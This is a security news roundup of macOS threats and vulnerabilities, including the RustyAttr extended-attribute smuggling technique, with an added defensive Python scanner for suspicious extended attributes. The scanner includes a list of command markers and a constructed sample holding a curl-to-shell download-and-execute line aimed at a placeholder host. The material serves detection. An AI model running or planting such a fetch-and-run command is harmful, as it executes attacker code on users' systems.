
In an increasingly connected digital era, macOS has become an enticing target for cybercriminals. From exploiting vulnerabilities that allow malicious applications to access sensitive data without user consent to sophisticated malware attacks targeting cryptocurrency assets, these threats underscore the importance of security awareness.
This article will explore recent incidents, including TCC-based vulnerabilities, attacks by APT groups, and malware specifically targeting macOS users, as well as essential protective measures that users should take to safeguard their personal data and devices from these emerging threats.
Malicious applications can bypass user consent and access sensitive data on macOS
A newly identified vulnerability in Apple’s Transparency, Consent, and Control (TCC) framework, tracked as CVE-2024-44131, allows malicious applications to bypass user consent and access sensitive data on both macOS and iOS. The flaw has been patched in the latest versions of both operating systems, but it raises significant concerns about user privacy and data security, since TCC is the layer that is supposed to gate app access to protected locations and services. read more..
macOS Malware payload named ‘InletDrift’
Radiant Capital has attributed a $50 million cryptocurrency theft to the North Korean threat actor known as Citrine Sleet, following a sophisticated attack that compromised its systems. The intrusion involved malware that bypassed multiple security layers and led to unauthorized transactions. The lure used a PDF file as a decoy alongside a macOS malware payload named ‘InletDrift’, which established a backdoor on the infected device. read more..
Realst stealer malware targeting macOS systems
Cybercriminals are exploiting the Web3 sector by using fake business meetings to distribute malware that targets cryptocurrency assets. Dubbed “Meeten,” this campaign employs sophisticated social engineering tactics to lure victims into downloading malicious software. The “Meeten” campaign uses fraudulent video conferencing software to distribute Realst stealer malware targeting both Windows and macOS systems. read more..
GodLoader malware: PoC exploits indicate potential for macOS attacks
Hackers have used the GodLoader malware to abuse the Godot game engine, infecting over 17,000 systems in three months by using the engine’s scripting capabilities to evade detection. The malware targets gamers across multiple platforms, allowing attackers to execute arbitrary code and steal sensitive information. GodLoader samples were primarily found targeting Windows, but proof-of-concept exploits indicate the same technique can be extended to Linux and macOS. read more..
Banshee Stealer targeted both x86_64 and ARM64 architectures on macOS
The source code for the macOS malware Banshee Stealer has been leaked and published on GitHub, leading to the shutdown of its operations by its developers. This malware, which targeted sensitive data, was previously promoted by Russian hackers. read more..
Attackers can exploit macOS to gain root privileges without a password
A critical vulnerability in Apple’s MallocStackLogging framework allows attackers to achieve local privilege escalation on macOS systems, posing a significant security risk. Despite Apple’s mitigations, the flaw can be exploited through clever manipulation of log file writes. read more..
Vulnerabilities that could lead to arbitrary code execution on Intel-based Macs
Apple has released critical security updates addressing two actively exploited vulnerabilities in its operating systems, reported by Google’s Threat Analysis Group. The vulnerabilities, CVE-2024-44308 and CVE-2024-44309, primarily affect Intel-based Mac systems and could allow arbitrary code execution. read more..
Malicious apps can modify shortcut files without user consent, potentially injecting harmful code
A critical security flaw in WorkflowKit, identified as CVE-2024-27821, allows malicious apps to intercept and modify shortcut files during the extraction process. The vulnerability poses significant risks, including the potential for arbitrary code execution and data exposure. read more..
AMOS targets macOS to steal sensitive data
Fake AI image and video generators are being used to distribute Lumma Stealer and AMOS malware, targeting Windows and macOS systems to steal sensitive information such as credentials and cryptocurrency wallets. These malicious sites impersonate a legitimate AI application, tricking users into downloading harmful software. read more..
North Korean APT group Lazarus, targeting macOS systems
Researchers at Group-IB have uncovered a new stealth technique used by the North Korean APT group Lazarus, which targets macOS systems through a code-smuggling method that utilizes custom extended attributes to evade antivirus detection. This method involves the deployment of a Trojan named RustyAttr, developed with the Tauri framework, allowing the malware to operate discreetly while distracting users with decoy applications. read more..
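The code-smuggling technique above hides a payload in a file's extended attributes, where signature scanners that only look at file contents will not see it. As an added example (not Group-IB's tooling or the RustyAttr sample), the script below scans a set of files for extended attributes that fall outside the names macOS itself writes, that are unusually large, or whose value looks like a script or command line. The allowlist of Apple attribute names, the size threshold, the marker strings and the sample bundle are all assumptions constructed for this example; the `test` attribute name and the shell one-liner in the sample are illustrative, not taken from the reported campaign.

```python
import os
from typing import Dict, List, NamedTuple

# Extended attributes that macOS components write routinely. This is an
# illustrative allowlist assumed by the example, not an Apple-published list.
KNOWN_MACOS_XATTRS = {
    "com.apple.quarantine",
    "com.apple.FinderInfo",
    "com.apple.ResourceFork",
    "com.apple.metadata:kMDItemWhereFroms",
    "com.apple.provenance",
}

# Byte patterns that suggest the attribute holds executable content rather
# than metadata (assumed marker set; extend for your environment).
SCRIPT_MARKERS = (b"#!/", b"osascript", b"curl ", b"<script", b"eval(", b"bash -c")

# Metadata values are normally small; anything above this is flagged (tunable).
LARGE_VALUE_BYTES = 512


class Finding(NamedTuple):
    name: str     # extended-attribute name
    reason: str   # why it was flagged


def suspicious_xattrs(attrs: Dict[str, bytes]) -> List[Finding]:
    """Classify one file's extended attributes (name -> raw value)."""
    findings: List[Finding] = []
    for name, value in attrs.items():
        if name not in KNOWN_MACOS_XATTRS:
            findings.append(Finding(name, "non-Apple attribute name"))
        if len(value) > LARGE_VALUE_BYTES:
            findings.append(Finding(name, f"oversized value ({len(value)} bytes)"))
        if any(marker in value for marker in SCRIPT_MARKERS):
            findings.append(Finding(name, "value contains script/command markers"))
    return findings


def read_xattrs(path: str) -> Dict[str, bytes]:
    """Read attributes from a real file. CPython exposes os.listxattr/os.getxattr
    on Linux only; on macOS use the `xattr -l <path>` command-line tool (or the
    xattr PyPI package) to collect the same name -> value mapping."""
    if not hasattr(os, "listxattr"):
        raise NotImplementedError("os.listxattr unavailable; use `xattr -l <path>` on macOS")
    return {name: os.getxattr(path, name) for name in os.listxattr(path)}


def scan_bundle(attrs_by_file: Dict[str, Dict[str, bytes]]) -> Dict[str, List[Finding]]:
    """Return only the files that produced findings."""
    results = {}
    for path, attrs in attrs_by_file.items():
        findings = suspicious_xattrs(attrs)
        if findings:
            results[path] = findings
    return results


# Constructed sample: attributes a decoy app bundle might carry. The quarantine
# values are made up; the "test" attribute is a hypothetical smuggled script.
SAMPLE_BUNDLE = {
    "Decoy.app/Contents/MacOS/Decoy": {
        "com.apple.quarantine": b"0083;66f1a2b3;Safari;",
    },
    "Decoy.app/Contents/Resources/notes.txt": {
        "com.apple.quarantine": b"0083;66f1a2b3;Safari;",
        "test": b"#!/bin/sh\ncurl -s https://example.invalid/p | sh\n",
    },
}

if __name__ == "__main__":
    for path, findings in scan_bundle(SAMPLE_BUNDLE).items():
        for finding in findings:
            print(f"{path}: {finding.name}: {finding.reason}")
```

On a live system, feed `read_xattrs(path)` for each file under the bundle into `scan_bundle`; a hit on a non-Apple attribute whose value starts with a shebang is exactly the pattern the passage describes, and is worth pairing with a check of the app's code signature since the extended attribute is not covered by it.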
Some Zoom apps for macOS before version 6.1.5 may allow an authenticated user to conduct an escalation of privilege via network access
Zoom has addressed six vulnerabilities in its video conferencing platform, including two high-severity issues that could allow remote attackers to escalate privileges or leak sensitive information. The vulnerabilities affect various Zoom applications and require updates to mitigate risks. read more..
Attackers can exploit Chrome macOS users via the File System Access API
Security researcher Ron Masas from Imperva Threat Research has revealed a new method for attackers to exploit Chrome users via the File System Access API, which can bypass security mechanisms on both Windows and macOS. This exploit can lead to severe security vulnerabilities, particularly for macOS users, if they inadvertently grant file access to malicious applications. read more..
Trojanized Notepad and Minesweeper apps passed Apple’s security checks
North Korean threat actors are targeting macOS systems with trojanized applications disguised as Notepad and Minesweeper games, leveraging a legitimate Apple developer ID to bypass security checks. The campaign appears to be an experimental effort to test methods for evading macOS security rather than a fully developed attack strategy. read more..
LightSpy spyware targeting iOS and macOS
Researchers have uncovered an advanced version of the LightSpy spyware targeting Apple iOS, which not only enhances its data-capturing capabilities but also introduces destructive features that can render devices inoperable. This modular implant exploits known vulnerabilities in iOS and macOS to deliver its payload and gather sensitive information from compromised devices. read more..
The “CryptoAITools” malware activates immediately upon installation, targeting macOS systems
Researchers have uncovered a malicious Python package named “CryptoAITools” that masquerades as a cryptocurrency trading tool but is designed to steal sensitive data and drain crypto wallets. The malware, distributed via PyPI and fake GitHub repositories, has been downloaded over 1,300 times and employs deceptive tactics to execute its malicious activities. read more..